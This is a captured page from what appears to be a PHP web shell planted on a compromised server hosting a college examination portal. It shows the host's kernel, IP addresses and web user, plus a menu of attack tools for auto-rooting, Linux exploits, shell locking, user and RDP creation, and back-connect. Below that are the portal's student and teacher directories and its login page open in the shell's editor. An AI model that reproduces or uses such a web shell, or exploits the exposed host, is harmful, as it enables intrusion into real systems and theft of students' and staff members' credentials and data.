Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.63.237
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
jssun /
[ HOME SHELL ]
Name
Size
Permission
Action
adm
[ DIR ]
drwxrwxrwx
backup
[ DIR ]
drwxrwsr-x
halltickets
[ DIR ]
drwxrwsr-x
images
[ DIR ]
drwxrwsr-x
img
[ DIR ]
drwxrwsr-x
imported_files
[ DIR ]
drwxrwxrwx
misc_files
[ DIR ]
drwxrwsr-x
student_photos
[ DIR ]
drwxrwsr-x
study_material
[ DIR ]
drwxrwsr-x
teacher_photos
[ DIR ]
drwxrwsr-x
tmpphotos
[ DIR ]
drwxrwsr-x
upload
[ DIR ]
drwxrwxrwx
MainPage.html
29.53
KB
-rw-r--r--
adm_portal_instructions_colleg...
393.82
KB
-rw-rw-r--
adm_portal_instructions_studen...
505.77
KB
-rw-rw-r--
collegeInfoPopup.html
4.35
KB
-rw-r--r--
flash.html
2.23
KB
-rw-r--r--
forgotpassword.html
3.38
KB
-rw-r--r--
homepage.html
4.15
KB
-rw-r--r--
index.html
9.92
KB
-rw-r--r--
indexlogin.html
9.92
KB
-rw-rw-r--
indexlogin2.html
6.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="pragma" content="no-cache" /> <title>Examination Automation</title> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> <!-- css files--> <link rel="shortcut icon" type="image/jpg" href="images/tarka_favicon.jpg" /> <link rel="stylesheet" type="text/css" href="../css/main.css" /> <link rel="stylesheet" type="text/css" href="../css/loginpage.css" /> <!-- <link rel="stylesheet" type="text/css" href="css/jquery.alerts.css" /> --> <link rel="stylesheet" type="text/css" href="../JQGrid3.5/css/jquery-ui-1.7.2.custom.css" /> <!--javascript files--> <script type="text/javascript" src="../js/checkbrowser.js"></script> <script type="text/javascript" src="../JQGrid3.5/js/jquery-1.3.2.js" ></script> <!-- <script type="text/javascript" src="JQGrid3.5/js/jquery-ui-1.7.2.custom.min.js"></script> --> <script type="text/javascript" src="../js/index.js?v=27122018"></script> <script src="../libs/jquery.jclock-1.2.0.js" type="text/javascript" ></script> <!-- <script type="text/javascript" src="js/base_file/spinner.js"></script> --> <script type="text/javascript"> /* $(function(){ // Dialog $("#dialog").dialog({ autoOpen: false, modal: true, width: 600, buttons: { "Ok": function() { $(this).dialog("close"); }, "Cancel": function() { $(this).dialog("close"); } } }); }); */ $(function ($) { $('.jclock').jclock() }) </script> </head> <body onload="loadwindow()" onkeydown="dologin(event)"> <div class="mainbody" align="center"> <!-- Header div part--> <div class="header"> <div class="header-top"> <div class="logo" align="left"></div> <div class="headerDetails" align="right"> <div class="tarka-site"></div> </div> </div> <div class="header-bottom"> <div style="float: left"></div> <div class="package" style="margin-left: 2px"> <span id="university_name"></span> </div> <div class="MainMenu" id="system_menu"></div> </div> <div id="tarka_menu_html_div" style="display: none"></div> </div> <!-- End Header div part--> <!--Main Contents Div --> <div class="contents"> <div class="loginpage_main__div"> <br /> <div class="login-Dash-board ui-corner-all"> <div class="ui-widget-header ui-corner-all" align="left" style="height: 20px" ></div> <p align="center" style="font-size: x-large; color: chocolate" > <b>Welcome to the College Portal</b><br /><br /> </p> <img src="#" id="university_logo" style="width: 150px; height: 150px" /> </div> <div class="login-div ui-corner-all"> <div class="ui-widget-header ui-corner-all">Login</div> <br /><br /><br /> <table border="0" align="center" class="login-tbl" style="width: 100px" cellpadding="0" cellspacing="0" > <tr> <td align="left" style="font-weight: 800"> College Code </td> </tr> <tr> <td align="left"> <input type="text" style="width: 195px" maxlength="4" id="college_code" onfocus="if(this.value=='CollegeCode') this.value='';" onblur="this.value=this.value.toUpperCase();" /> </td> </tr> <tr> <td align="left"> </td> </tr> <tr> <td align="left" style="font-weight: 800"> User Name </td> </tr> <tr> <td align="left"> <input type="text" style="width: 195px" id="user_name" onfocus="if(this.value=='Username') this.value='';" /> </td> </tr> <tr> <td align="left"> </td> </tr> <tr> <td align="left" style="font-weight: 800"> Password </td> </tr> <tr> <td align="left"> <input style="width: 195px" id="password" type="password" onfocus="if(this.value=='******') this.value='';" /> </td> </tr> <tr> <td> </td> </tr> </table> <div> <a onClick="javascript:login();" href="#" style=" cursor: pointer; text-decoration: none; padding: 3px 5px; " class="ui-corner-all ui-widget-header" > Sign In </a> </div> <!-- <div style="margin-top:60px;margin-left:20px;"> <a onClick="" href="#" style="cursor: pointer;display:none;" > Forgot Password ? </a> </div> --> <!-- <table border="0" align="center" class="content-tbl" style="padding-left:10px; width:170px;" cellpadding="2" cellspacing="8"> <tr> <td align="center"><a href="forgotpassword.html#modal">Forgot Password?</a></td> </tr> <tr> <td> </td></tr> </table> --> </div> <div></div> </div> <!-- <div style="width:848px;font-size:12px;" align="left"></p> --> <!-- <b>Click here to Download :</b> <a href="Firefox Setup 3.6.4.exe">Mozilla FireFox</a> <a href="ChromeSetup.exe">Chrome</a> <a href="oasis_manual.pdf" target="_blank">Oasis User Manual</a></p></div> --> <div style="padding: 20px 10px"> <span align="left" class="jdate" id="jdate" style="float: left; margin-left: 20px" ></span> <span align="left" class="jclock" style="float: right; padding: 0px 20px" ></span ><span style="clear: both"></span> </div> <!-- login page main div--> </div> <!-- End Main Contents Div --> <!-- Footer Div--> <div class="footer"></div> <div id="dialog" title=""></div> </div> </body> </html>
Close